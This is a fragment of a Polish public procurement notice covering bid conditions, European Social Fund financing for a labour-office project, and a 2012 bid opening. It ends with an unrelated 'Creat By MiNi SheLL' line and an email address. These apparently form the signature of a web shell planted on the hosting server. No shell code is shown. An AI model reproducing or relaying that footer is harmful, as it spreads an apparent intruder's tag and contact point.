<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -   Zamawiający nie dopuszcza składania ofert częściowych.
-   Zamawiający nie dopuszcza składania ofert wariantowych.
-   Zamawiający nie przewiduje zamówień uzupełniających.
-   Zamawiający nie przewiduje zawarcia umowy ramowej.
-   Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
-   Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
-  Zamówienie jest finansowane ze środków Unii Europejskiej w ramach dwóch projektów:  
    Profesjonalny pośrednik - dostępny Urząd, Profesjonalizm naszą dewizą - uśmiech naszą 
    wizytówką współfinansowanych ze środków Europejskiego Funduszu Społecznego, realizowanego   
    z Programu Operacyjnego Kapitał Ludzki - Priorytet VI Rynek pracy otwarty dla wszystkich, 
    Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, 
    Poddziałanie 6.1.2 Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na 
    rzecz aktywizacji zawodowej osób bezrobotnych w regionie.
- Otwarcie ofert nastąpi w dniu 04.04.2012r. o godz. 12:10 w siedzibie Zamawiającego 
w pokoju  nr 208. Otwarcie ofert jest jawne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com